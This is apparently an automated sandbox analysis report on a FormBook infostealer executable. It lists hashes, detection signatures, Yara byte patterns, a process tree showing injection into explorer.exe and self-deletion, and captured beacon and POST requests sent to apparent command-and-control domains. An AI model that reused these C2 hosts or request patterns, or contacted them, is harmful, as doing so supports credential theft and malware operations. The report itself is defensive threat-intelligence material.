
# Analysis Report R6o4qCis6s.exe

## Overview

### General Information

- Sample Name: R6o4qCis6s.exe
- Analysis ID: 287799
- MD5: 79f04bd1fc5f9757f7979bb8cbefdd5e
- SHA1: e34056989f520736af44df68d869b71a4d4d695f
- SHA256: 8aafecddd3b462d27c24000757496edb5c6bce1e6abff9157d5360457b0805d7
- Tags: exe

### Detection

FormBook
- Score: 100 (Range: 0 - 100)
- Whitelisted: false
- Confidence: 100%

### Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected FormBook malware
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Creates an undocumented autostart registry key
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

System is w10x64. Process tree:

- R6o4qCis6s.exe (PID: 6652; cmdline: 'C:\Users\user\Desktop\R6o4qCis6s.exe'; MD5: 79F04BD1FC5F9757F7979BB8CBEFDD5E)
- R6o4qCis6s.exe (PID: 6680; cmdline: 'C:\Users\user\Desktop\R6o4qCis6s.exe'; MD5: 79F04BD1FC5F9757F7979BB8CBEFDD5E)
- explorer.exe (PID: 3376; cmdline: (empty); MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- explorer.exe (PID: 7040; cmdline: C:\Windows\SysWOW64\explorer.exe; MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
- cmd.exe (PID: 368; cmdline: /c del 'C:\Users\user\Desktop\R6o4qCis6s.exe'; MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 6204; cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1; MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

## Malware Configuration

No configs have been found
Yara matches in memory dumps (Source / Rule / Description / Author / Strings):

Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp
- Rule: JoeSecurity_FormBook (Yara detected FormBook); Author: Joe Security
- Rule: Formbook_1 (autogenerated rule brought to you by yara-signator); Author: Felix Bilstein - yara-signator at cocacoding dot com. Strings:
  - 0x98d8: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  - 0x9b42: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  - 0x15675: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  - 0x15161: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
  - 0x15777: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  - 0x158ef: $sequence_4: 5D C3 8D 50 7C 80 FA 07
  - 0xa55a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  - 0x143dc: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  - 0xb253: $sequence_7: 66 89 0C 02 5B 8B E5 5D
  - 0x1b267: $sequence_8: 3C 54 74 04 3C 74 75 F4
  - 0x1c26a: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
- Rule: Formbook (detect Formbook in memory); Author: JPCERT/CC Incident Response Group. Strings:
  - 0x18349: $sqlite3step: 68 34 1C 7B E1
  - 0x1845c: $sqlite3step: 68 34 1C 7B E1
  - 0x18378: $sqlite3text: 68 38 2A 90 C5
  - 0x1849d: $sqlite3text: 68 38 2A 90 C5
  - 0x1838b: $sqlite3blob: 68 53 D8 7F 8C
  - 0x184b3: $sqlite3blob: 68 53 D8 7F 8C

Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp
- Rule: JoeSecurity_FormBook (Yara detected FormBook); Author: Joe Security
- Rule: Formbook_1 (autogenerated rule brought to you by yara-signator); Author: Felix Bilstein - yara-signator at cocacoding dot com. Strings:
  - 0x98d8: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  - 0x9b42: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  - 0x15675: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  - 0x15161: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
  - 0x15777: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  - 0x158ef: $sequence_4: 5D C3 8D 50 7C 80 FA 07
  - 0xa55a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  - 0x143dc: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  - 0xb253: $sequence_7: 66 89 0C 02 5B 8B E5 5D
  - 0x1b267: $sequence_8: 3C 54 74 04 3C 74 75 F4
  - 0x1c26a: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Yara matches in unpacked PE files (Source / Rule / Description / Author / Strings):

Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack
- Rule: JoeSecurity_FormBook (Yara detected FormBook); Author: Joe Security
- Rule: Formbook_1 (autogenerated rule brought to you by yara-signator); Author: Felix Bilstein - yara-signator at cocacoding dot com. Strings:
  - 0x98d8: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  - 0x9b42: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  - 0x15675: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  - 0x15161: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
  - 0x15777: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  - 0x158ef: $sequence_4: 5D C3 8D 50 7C 80 FA 07
  - 0xa55a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  - 0x143dc: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  - 0xb253: $sequence_7: 66 89 0C 02 5B 8B E5 5D
  - 0x1b267: $sequence_8: 3C 54 74 04 3C 74 75 F4
  - 0x1c26a: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
- Rule: Formbook (detect Formbook in memory); Author: JPCERT/CC Incident Response Group. Strings:
  - 0x18349: $sqlite3step: 68 34 1C 7B E1
  - 0x1845c: $sqlite3step: 68 34 1C 7B E1
  - 0x18378: $sqlite3text: 68 38 2A 90 C5
  - 0x1849d: $sqlite3text: 68 38 2A 90 C5
  - 0x1838b: $sqlite3blob: 68 53 D8 7F 8C
  - 0x184b3: $sqlite3blob: 68 53 D8 7F 8C

Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack
- Rule: JoeSecurity_FormBook (Yara detected FormBook); Author: Joe Security
- Rule: Formbook_1 (autogenerated rule brought to you by yara-signator); Author: Felix Bilstein - yara-signator at cocacoding dot com. Strings:
  - 0x8ad8: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  - 0x8d42: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  - 0x14875: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  - 0x14361: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
  - 0x14977: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  - 0x14aef: $sequence_4: 5D C3 8D 50 7C 80 FA 07
  - 0x975a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  - 0x135dc: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  - 0xa453: $sequence_7: 66 89 0C 02 5B 8B E5 5D
  - 0x1a467: $sequence_8: 3C 54 74 04 3C 74 75 F4
  - 0x1b46a: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

## Sigma Overview

No Sigma rule has matched

## Signature Overview

### AV Detection:

Antivirus / Scanner detection for submitted sample
- Source: R6o4qCis6s.exe; Avira: detected

Antivirus detection for URL or domain
- Source: http://www.heyidianzib.com/tln/; Avira URL Cloud: Label: malware
- Source: http://www.heyidianzib.com; Avira URL Cloud: Label: malware
- Source: http://www.heyidianzib.com/tln/www.olisolution.com; Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL
- Source: www.glowtey.com; Virustotal: Detection: 7%
- Source: http://www.glowtey.com/tln/; Virustotal: Detection: 8%
- Source: http://www.glowtey.com; Virustotal: Detection: 7%

Multi AV Scanner detection for submitted file
- Source: R6o4qCis6s.exe; Virustotal: Detection: 77%
- Source: R6o4qCis6s.exe; ReversingLabs: Detection: 79%

Yara detected FormBook
- Source: Yara match; file sources of type MEMORY: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp
- Source: Yara match; file sources of type UNPACKEDPE: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, 0.2.R6o4qCis6s.exe.4170000.2.unpack, 0.2.R6o4qCis6s.exe.41b0000.3.unpack, 1.1.R6o4qCis6s.exe.400000.0.unpack, 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, 1.2.R6o4qCis6s.exe.400000.0.unpack

Machine Learning detection for sample
- Source: R6o4qCis6s.exe; Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file
- Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 1.1.R6o4qCis6s.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 1.2.R6o4qCis6s.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Contains functionality to enumerate / list files inside a directory
- Source: C:\Users\user\Desktop\R6o4qCis6s.exe; Code function: 0_2_00408D20 FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime
- Source: C:\Users\user\Desktop\R6o4qCis6s.exe; Code function: 0_2_00405BE0 GetModuleHandleA, GetProcAddress, lstrcpyn, lstrcpyn, lstrcpyn, FindFirstFileA, FindClose, lstrlen, lstrcpyn, lstrlen, lstrcpyn

### Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
- Source: Traffic; Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49734

HTTP GET or POST without a user agent
- Source: global traffic; HTTP traffic detected (Data Raw: 00 00 00 00 00 00 00; Data Ascii: empty):

```http
GET /tln/?TTF=D8Oxqr&jfIlkD=Gih6PLZ1iCkKV6XaU73/B7cCcaHYH4uOLwbm5LWBOFF6YtYGomD/H0QVY53aBPOxn4Dm HTTP/1.1
Host: www.cashflowtoday.net
Connection: close
```

- Source: global traffic; HTTP traffic detected (Data Raw: 00 00 00 00 00 00 00; Data Ascii: empty):

```http
GET /tln/?jfIlkD=aheimOvVxRHS9+ZkV/8M4zSPjXUKcvGCrPlEERzYyjhu9GlhsqSRacAATphOmA3mqti9&TTF=D8Oxqr HTTP/1.1
Host: www.themayoparty.com
Connection: close
```

IP address seen in connection with other malware
- Source: Joe Sandbox View; IP Address: 34.102.136.180

Internet Provider seen in connection with other malware
- Source: Joe Sandbox View; ASN Name: AMAZON-02US
- Source: Joe Sandbox View; ASN Name: GOOGLEUS

Uses a known web browser user agent for HTTP communication
- Source: global traffic; HTTP traffic detected (POST with a 412-byte form-encoded body):

```http
POST /tln/ HTTP/1.1
Host: www.themayoparty.com
Connection: close
Content-Length: 412
Cache-Control: no-cache
Origin: http://www.themayoparty.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.themayoparty.com/tln/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
```

- Source: global traffic; HTTP traffic detected (POST with a 163864-byte form-encoded body):

```http
POST /tln/ HTTP/1.1
Host: www.themayoparty.com
Connection: close
Content-Length: 163864
Cache-Control: no-cache
Origin: http://www.themayoparty.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.themayoparty.com/tln/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
```
Performs DNS lookups
- Source: unknown; DNS traffic detected: queries for: www.cashflowtoday.net

Posts data to webserver
- Source: unknown; HTTP traffic detected (POST with a 412-byte form-encoded body):

```http
POST /tln/ HTTP/1.1
Host: www.themayoparty.com
Connection: close
Content-Length: 412
Cache-Control: no-cache
Origin: http://www.themayoparty.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.themayoparty.com/tln/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
```
Urls found in memory or binary data

Contains functionality to read the clipboard data
- Source: C:\Users\user\Desktop\R6o4qCis6s.exe; Code function: 0_2_00424C58 GetClipboardData, CopyEnhMetaFileA, GetEnhMetaFileHeader

Contains functionality to retrieve information about pressed keystrokes
- Source: C:\Users\user\Desktop\R6o4qCis6s.exe; Code function: 0_2_0043A784 GetKeyboardState

### E-Banking Fraud:

Yara detected FormBook
- Source: Yara match; file sources of type MEMORY: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp
- Source: Yara match; file sources of type UNPACKEDPE: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, 0.2.R6o4qCis6s.exe.4170000.2.unpack, 0.2.R6o4qCis6s.exe.41b0000.3.unpack, 1.1.R6o4qCis6s.exe.400000.0.unpack, 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, 1.2.R6o4qCis6s.exe.400000.0.unpack

### System Summary:

 Detected FormBook malware Show sources
 Malicious sample detected (through community Yara rule) Show sources
 Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 
00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by 
yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought 
to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Contains functionality to call native functions Show sources
 Detected potential crypto function Show sources
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C340 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00452DE0 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0044D1BC Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0046724C Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00401026 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00401030 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041DA67 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041D4F2 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041E4F7 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041E4FA Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00402D87 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00402D90 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00409E20 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041CEE3 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041E764 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00402FB0 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0B090 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1002 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A14120 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FF900 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2EBB0 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0841F Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0D5E0 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F0D20 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC1D55 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A16E30 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483B090 Source: 
C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048520A0 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F20A8 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F28EC Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1002 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483841F Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048ED466 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04852581 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F25DD Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483D5E0 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482F900 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F2D07 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04820D20 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04844120 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F1D55 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F22AE Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F2EF7 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04846E30 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485EBB0 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048EDBD2 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F1FF1 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F2B28 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0023E4F7 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0023E4FA Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00222D87 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00222D90 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00229E20 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00222FB0
 Found potential string decryption / allocating functions
 Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 0482B150 appears 35 times
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: String function: 009FB150 appears 32 times
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: String function: 00406A94 appears 57 times
 PE file contains strange resources
 Source: R6o4qCis6s.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
 Source: R6o4qCis6s.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
 Source: R6o4qCis6s.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
 Sample file is different than original file name gathered from version info
 Source: R6o4qCis6s.exe, 00000000.00000002.213709670.0000000002250000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs R6o4qCis6s.exe
 Source: R6o4qCis6s.exe, 00000001.00000002.257369887.0000000002ABE000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameEXPLORER.EXEj% vs R6o4qCis6s.exe
 Source: R6o4qCis6s.exe, 00000001.00000002.256353514.0000000000AEF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs R6o4qCis6s.exe
 Yara signature match
 Classification label
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/3@6/2
 Contains functionality for error logging
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00421830 GetLastError,FormatMessageA,
 Contains functionality to check free disk space
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00408E98 GetDiskFreeSpaceA,
 Contains functionality to load and extract PE file embedded resources
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004146E8 FindResourceA,
 Creates files inside the user directory
 Creates mutexes
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
 Launches a second explorer.exe instance
 Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe
 Parts of this application are using Borland Delphi (probably coded in Delphi)
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
 Reads the hosts file
 Sample is known by Antivirus
 Source: R6o4qCis6s.exe Virustotal: Detection: 77%
 Source: R6o4qCis6s.exe ReversingLabs: Detection: 79%
 Spawns processes
 Source: unknown Process created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe'
 Source: unknown Process created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe'
 Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
 Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\R6o4qCis6s.exe'
 Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Process created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe'
